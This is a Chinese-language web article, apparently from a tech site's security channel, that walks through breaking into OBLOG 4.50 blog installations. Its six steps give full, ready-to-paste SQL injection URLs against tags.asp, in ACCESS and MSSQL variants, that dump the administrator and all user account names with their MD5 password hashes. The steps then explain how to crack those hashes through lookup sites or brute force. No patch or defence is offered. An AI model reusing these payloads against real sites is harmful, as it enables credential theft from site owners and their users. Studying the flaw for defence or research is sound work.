网络安全 频道

一句话让OBLOG将用户密码乖乖送上

  二,根据程序与版本漏洞进行入侵:

  不同版本,不同程序的漏洞不同,入侵方法也不同,对于OBLOG 4.50 final build0619版来说我们可以通过标签法实现入侵目的,利用SQL注入漏洞让OBLOG将全部用户的帐户名与密码显示出来。

  第一步:通过http://ip/tags.asp命令显示出该OBLOG系统的所有标签信息。(如图3)

图3

  第二步:我们随意选择一个标签,要求这个标签里面是有内容的,不能为空。里面内容包括名字,发布者与发布时间。当然还有一点特别重要那就是记下这个标签对应的ID信息,例如笔者选择该标签后上方地址处对应的ID地址信息为“tags.asp?tagid=42”。(如图4)

图4

  第三步:接下来就是通过一句话对OBLOG系统进行SQL注入入侵了,我们在之前记录的TAGS标签ID信息基础上添加注入命令,例如上面看到的ID地址信息为“tags.asp?tagid=42”,那么我们输入以下内容——

  http://IP/tags.asp?t=user&keyword=trace&tagid=42%20group%20by%20userid)%20a,oblog_user%20b%20where%20a.userid=b.userid%20and%201=2%20union%20select%20username%2bchr(124)%2bpassword,2,3%20from%20oblog_admin%20union%20select%20top%20100%20b.userName,b.user_dir,b.user_folder%20from%20(select%20userid%20from%20oblog_usertags%20where%20tagid=42%20and%201=2

  代码中有两处是于tagid=42相对应的,这点需要特别留意。当然如果目的站点使用的是MSSQL数据库而不是本文介绍的ACCESS数据库的话,相关的SQL注入代码也要进行改变,具体内容为——http://IP/tags.asp?t=user&keyword=trace&tagid=42 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select username%2bchar(124)%2bpassword,2,3 From Oblog_admin union select Top 100 b.userName,b.user_dir,b.user_folder

  该命令执行后OBLOG将把管理员的帐户名与密码显示出来,我们可以在显示页面中看到相关信息,在|前显示的是帐户名,后面是密码,不过密码都是通过MD5加密过的。(如图5)

图5

  第四步:除了让OBLOG显示管理员相关信息外我们还可以通过以下指令让OBLOG显示其所有用户名与密码信息,这也是非常危险的。具体注入代码为——

  http://IP/tags.asp?t=user&keyword=trace&tagid=42%20group%20by%20userid)%20a,oblog_user%20b%20where%20a.userid=b.userid%20and%201=2%20union%20select%20username%2bchr(124)%2bpassword,2,3%20from%20oblog_user%20union%20select%20top%20100%20b.userName,b.user_dir,b.user_folder%20from%20(select%20userid%20from%20oblog_usertags%20where%20tagid=42%20and%201=2

  输入完毕所有在该OBLOG博客平台上注册的帐户与密码都会显示出来,同样密码是经过MD5加密过的。(如图6)

图6

  第五步:有了明文帐户名与MD5加密过的密码我们基本上可以直接破解出明文密码,只需要通过一些MD5查询站点就能够将MD5密码顺利还原为明文信息。(如图7)

图7

  第六步:不过并不是所有MD5加密密码都能够通过查询站点反查出明文信息的,如果不成功的话我们只能够通过MD5暴力破解工具实现了,关于MD5暴力破解工具笔者在以前的文章中进行过详细的介绍,这里由于篇幅关系就不继续说明了,总之暴力破解MD5密文需要的时间是比较长的,一个7位明文密码对应MD5密码的破解需要几天时间。当然一些MD5密码反查站点也提供了相关有偿服务,部分密码的反查需要我们支付一条一毛钱的费用,如果觉得暴力破解麻烦的读者可以选择付费服务快速解决问题。(如图8)

图8

 

0
相关文章